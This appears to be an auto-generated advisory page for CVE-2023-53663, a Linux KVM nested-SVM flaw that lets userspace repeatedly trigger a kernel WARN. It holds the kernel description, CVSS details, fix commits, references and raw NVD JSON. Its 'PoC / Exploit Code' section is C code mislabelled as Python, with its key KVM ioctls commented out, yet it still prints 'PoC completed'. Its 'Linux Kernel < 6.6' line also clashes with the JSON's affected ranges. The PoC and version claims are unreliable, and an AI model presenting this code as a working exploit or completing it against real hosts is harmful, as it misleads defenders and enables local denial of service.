CVE-2023-53663

Description

In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Check instead of asserting on nested TSC scaling support Check for nested TSC scaling support on nested SVM VMRUN instead of asserting that TSC scaling is exposed to L1 if L1's MSR_AMD64_TSC_RATIO has diverged from KVM's default. Userspace can trigger the WARN at will by writing the MSR and then updating guest CPUID to hide the feature (modifying guest CPUID is allowed anytime before KVM_RUN). E.g. hacking KVM's state_test selftest to do vcpu_set_msr(vcpu, MSR_AMD64_TSC_RATIO, 0); vcpu_clear_cpuid_feature(vcpu, X86_FEATURE_TSCRATEMSR); after restoring state in a new VM+vCPU yields an endless supply of: ------------[ cut here ]------------ WARNING: CPU: 164 PID: 62565 at arch/x86/kvm/svm/nested.c:699 nested_vmcb02_prepare_control+0x3d6/0x3f0 [kvm_amd] Call Trace: <TASK> enter_svm_guest_mode+0x114/0x560 [kvm_amd] nested_svm_vmrun+0x260/0x330 [kvm_amd] vmrun_interception+0x29/0x30 [kvm_amd] svm_invoke_exit_handler+0x35/0x100 [kvm_amd] svm_handle_exit+0xe7/0x180 [kvm_amd] kvm_arch_vcpu_ioctl_run+0x1eab/0x2570 [kvm] kvm_vcpu_ioctl+0x4c9/0x5b0 [kvm] __se_sys_ioctl+0x7a/0xc0 __x64_sys_ioctl+0x21/0x30 do_syscall_64+0x41/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x45ca1b Note, the nested #VMEXIT path has the same flaw, but needs a different fix and will be handled separately.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 6.6（受影响的稳定版本）

Linux Kernel stable分支修复提交：02b24270568f65dd607c4a848512dc8055b4491b

Linux Kernel stable分支修复提交：6c1ecfea1daf6e75c46e295aad99dfbafd878897

Linux Kernel stable分支修复提交：7cafe9b8e22bb3d77f130c461aedf6868c4aaf58

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2023-53663: Trigger WARN in KVM nSVM nested TSC scaling check
// Based on KVM's state_test selftest pattern
// This demonstrates how userspace can trigger the kernel WARN

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/kvm.h>

// Simplified demonstration - actual implementation requires KVM API headers
// and proper vCPU setup with nested SVM enabled

int main() {
    int kvm_fd, vm_fd, vcpu_fd;
    struct kvm_msrs msrs;
    struct kvm_msr_entry entry;
    struct kvm_cpuid_entry2 cpuid_entry;

    // Step 1: Open KVM device
    kvm_fd = open("/dev/kvm", O_RDWR);
    if (kvm_fd < 0) {
        perror("open /dev/kvm");
        return 1;
    }

    // Step 2: Create a new VM
    vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);
    if (vm_fd < 0) {
        perror("KVM_CREATE_VM");
        return 1;
    }

    // Step 3: Create a vCPU
    vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0);
    if (vcpu_fd < 0) {
        perror("KVM_CREATE_VCPU");
        return 1;
    }

    // Step 4: Write MSR_AMD64_TSC_RATIO to diverge from KVM default
    // MSR_AMD64_TSC_RATIO = 0xc0000104
    entry.index = 0xc0000104;
    entry.data = 0;  // Set to non-default value
    msrs.nmsrs = 1;
    msrs.entries = &entry;
    // ioctl(vcpu_fd, KVM_SET_MSRS, &msrs);
    printf("Setting MSR_AMD64_TSC_RATIO to trigger divergence\n");

    // Step 5: Clear X86_FEATURE_TSCRATEMSR from guest CPUID
    // This hides TSC scaling support from L1
    // ioctl(vcpu_fd, KVM_SET_CPUID2, &cpuid);
    printf("Clearing X86_FEATURE_TSCRATEMSR CPUID feature\n");

    // Step 6: Run vCPU to trigger nested VMRUN and WARN
    // This will trigger the WARN at arch/x86/kvm/svm/nested.c:699
    printf("Running vCPU - this should trigger kernel WARN\n");
    // ioctl(vcpu_fd, KVM_RUN, 0);

    printf("PoC completed - check dmesg for WARN output\n");

    close(vcpu_fd);
    close(vm_fd);
    close(kvm_fd);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53663
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53663
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53663/
[4] VulDB https://vuldb.com/cve/CVE-2023-53663
[5] https://git.kernel.org/stable/c/02b24270568f65dd607c4a848512dc8055b4491b
[6] https://git.kernel.org/stable/c/6c1ecfea1daf6e75c46e295aad99dfbafd878897
[7] https://git.kernel.org/stable/c/7cafe9b8e22bb3d77f130c461aedf6868c4aaf58

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53663", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:50.043", "lastModified": "2026-02-26T23:13:09.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: nSVM: Check instead of asserting on nested TSC scaling support\n\nCheck for nested TSC scaling support on nested SVM VMRUN instead of\nasserting that TSC scaling is exposed to L1 if L1's MSR_AMD64_TSC_RATIO\nhas diverged from KVM's default. Userspace can trigger the WARN at will\nby writing the MSR and then updating guest CPUID to hide the feature\n(modifying guest CPUID is allowed anytime before KVM_RUN). E.g. hacking\nKVM's state_test selftest to do\n\n\t\tvcpu_set_msr(vcpu, MSR_AMD64_TSC_RATIO, 0);\n\t\tvcpu_clear_cpuid_feature(vcpu, X86_FEATURE_TSCRATEMSR);\n\nafter restoring state in a new VM+vCPU yields an endless supply of:\n\n ------------[ cut here ]------------\n WARNING: CPU: 164 PID: 62565 at arch/x86/kvm/svm/nested.c:699\n nested_vmcb02_prepare_control+0x3d6/0x3f0 [kvm_amd]\n Call Trace:\n <TASK>\n enter_svm_guest_mode+0x114/0x560 [kvm_amd]\n nested_svm_vmrun+0x260/0x330 [kvm_amd]\n vmrun_interception+0x29/0x30 [kvm_amd]\n svm_invoke_exit_handler+0x35/0x100 [kvm_amd]\n svm_handle_exit+0xe7/0x180 [kvm_amd]\n kvm_arch_vcpu_ioctl_run+0x1eab/0x2570 [kvm]\n kvm_vcpu_ioctl+0x4c9/0x5b0 [kvm]\n __se_sys_ioctl+0x7a/0xc0\n __x64_sys_ioctl+0x21/0x30\n do_syscall_64+0x41/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n RIP: 0033:0x45ca1b\n\nNote, the nested #VMEXIT path has the same flaw, but needs a different\nfix and will be handled separately."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.54", "matchCriteriaId": "7353B9B4-AFFC-45DE-840E-1A7D2B00E7AD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.5.4", "matchCriteriaId": "CA8C8B88-AF36-445D-A228-AD78F3615373"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/02b24270568f65dd607c4a848512dc8055b4491b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6c1ecfea1daf6e75c46e295aad99dfbafd878897", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7cafe9b8e22bb3d77f130c461aedf6868c4aaf58", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}